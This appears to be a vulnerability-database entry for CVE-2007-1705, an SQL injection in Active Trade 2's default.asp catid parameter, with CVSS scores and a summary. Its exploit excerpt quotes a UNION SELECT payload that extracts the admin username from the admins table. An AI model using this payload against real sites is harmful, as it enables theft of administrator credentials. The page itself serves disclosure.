7.5
CVSSv2

CVE-2007-1705

Published: 27/03/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in default.asp in Active Trade 2 allows remote malicious users to execute arbitrary SQL commands via the catid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

active trade active trade 2

Exploits

#Title : Active Trade Remote SQL Injection Vulnerability #Author : CyberGhost #Demo Page : wwwactivewebsoftwarescom/demoactivetrade #Script Page : wwwactivewebsoftwarescom/productinfoaspx?productid=32 #Vuln #Username : /defaultasp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1 #Password : /defaultasp? ...